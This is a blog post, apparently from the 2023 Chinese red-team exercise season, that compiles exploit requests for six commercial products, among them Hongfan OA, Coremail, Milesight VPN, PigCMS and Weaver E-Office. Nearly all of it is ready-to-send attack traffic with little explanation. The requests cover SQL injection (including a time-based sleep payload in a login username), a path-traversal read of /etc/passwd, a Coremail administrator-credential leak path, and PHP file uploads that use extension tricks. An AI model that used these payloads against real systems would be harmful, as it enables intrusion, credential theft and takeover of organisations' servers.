hvv2023_some_poc_exp

0x01 Hongfan (红帆) OA zyy_AttFile.asmx SQL injection vulnerability

POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
Host: 10.250.250.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 383
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetFileAtt"
Accept-Encoding: gzip, deflate
Connection: close

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt></soap:Body></soap:Envelope>

Source: https://bbs.decoyit.com/thread-597-1-1.html

0x02 Coremail mail system unauthorized access exposing administrator credentials

/coremail/common/assets/:/:/:/:/:/:/s?biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626688&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2

Source: https://github.com/ibaiw/2023Hvv/blob/main/Coremail%20%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E8%8E%B7%E5%8F%96%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%AF%86.md

0x03 Milesight VPN server.js arbitrary file read vulnerability

GET /../etc/passwd HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded


Source: https://github.com/ibaiw/2023Hvv/blob/main/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

0x04 PigCMS action_flashUpload arbitrary file upload vulnerability

POC:
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa

/cms/upload/images/2023/08/11/1691722887xXbx.php

Source: https://github.com/ibaiw/2023Hvv/blob/main/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md

0x05 Weaver (泛微) E-Office CVE-2023-2523/CVE-2023-2648 arbitrary file upload

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: 127.0.0.1
Content-Length: 352
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 204
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

Source: https://blog.csdn.net/qq_41904294/article/details/130832416

0x06 辰信景云 Endpoint Security Management System login SQL injection vulnerability

POST /api/user/login

captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='

Source: https://github.com/ibaiw/2023Hvv/blob/main/%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md


Original post: https://blog.njcit.me/2023/08/24/poc_exp/hvv2023-some-poc-exp/
Author: ccadmin
Published: 24 August 2023
License